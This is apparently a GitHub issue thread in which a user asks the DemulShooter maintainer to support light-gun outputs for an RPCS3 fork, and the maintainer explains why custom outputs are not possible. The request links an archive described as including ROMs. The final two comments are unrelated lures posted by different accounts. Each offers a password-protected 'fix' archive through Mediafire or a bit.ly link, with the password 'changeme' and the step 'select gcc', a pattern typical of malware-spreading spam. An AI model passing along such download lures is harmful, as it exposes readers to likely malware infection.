### ISSUE TITLE
Request: New RPCS3 fork now has raw input

### ISSUE THREAD

**Issue by bro007-eng** [argonlefou/DemulShooter#250]
Hi Argon - glad u go GSEVO going - RPCS3 latest fork has raw inputs now (meaning we can use two light guns finally), so we were hoping if you could update demulshooter to generate the outputs for it.  Michael in our LGL group has provided this link with the 3-4 games that use this version of RPSC3. Roms are included with ahks to launch save states etc. https://archive.org/details/rpcs-3-last-test  link to the group vid which might be helpful to show how you setup the lightguns and pick out the raw input devices etc https://www.facebook.com/1781503120/videos/1020824796036027/

**Comment by argonlefou** [comment]
Hi,

Based on the previous experience I had with System 357 fork of RPCS3 (rpcs3-gun), you may have seen that custom outputs were not available for those games.
Except for the custom recoil, simply because it was triggered by the genuine recoil signal of the arcade game

The reason behind this is the very complex way of accessing in-game data, as the emulator dynamically recompile the PS3 game language into PC-compatible code chunks of files (the famous PPU cache)

I think I was really lucky to be able to pull out genuine arcade signals out of it, mainly because those signals are more or less exposed to be used by an external IO board or equivalent.
Accessing in-game dynamically allowed data like life, ammo count or any other (to create custom recoil signal) was not possible

So, creating custom outputs for those console games (i.e : without any real arcade outputs to be based on) is unfortunatelly not currently possible

At least for me, with what my current knowledge.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
